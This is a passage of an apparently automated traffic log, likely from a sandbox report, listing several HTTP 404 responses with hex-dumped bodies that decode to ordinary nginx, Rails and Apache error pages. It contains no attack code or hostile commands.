6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:08 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:11 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:14 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 102edd6b-9466-4f7e-8804-87a87faaa0c4x-runtime: 0.025563content-length: 18245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: cb9f6b69-dc63-4e2d-be7d-c6acb065fe0ax-runtime: 0.051811content-length: 18269connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 4b985045-4e35-4cf0-bbf2-5ba0b279109bx-runtime: 0.023026content-length: 19281connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:20:00 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- 